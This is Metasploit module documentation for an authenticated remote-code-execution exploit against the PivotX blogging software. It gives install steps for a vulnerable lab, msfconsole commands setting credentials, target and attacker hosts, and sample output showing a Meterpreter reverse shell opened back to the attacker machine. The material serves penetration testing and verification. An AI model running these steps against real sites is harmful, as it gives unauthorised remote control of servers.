## Vulnerable Application

PivotX is free software to help you maintain dynamic sites such as weblogs, online journals and other frequently updated websites in general.
It's written in PHP and uses MySQL or flat files as a database.

Install steps:

1. Install Apache2, MySQL, PHP8.2+
1. `git clone https://github.com/pivotx/PivotX.git`
1. Move `PivotX` to the web folder
1. Run the following from the web folder: `sudo chown -R www-data:www-data ./`

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/pivotx_rce`
1. Do: `set USERNAME [PivotX username]`
1. Do: `set PASSWORD [PivotX password]`
1. Do: `set RHOSTS [target IP]`
1. Do: `set LHOST [attacker IP]`
1. Do: `run`

## Options

### USERNAME

PivotX username.

### PASSWORD

PivotX password.

## Scenarios

```
msf exploit(linux/http/pivotx_rce) > run verbose=true
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 4 opened (192.168.168.128:4444 -> 192.168.168.146:40562) at 2025-07-18 14:20:03 +0200

meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux
```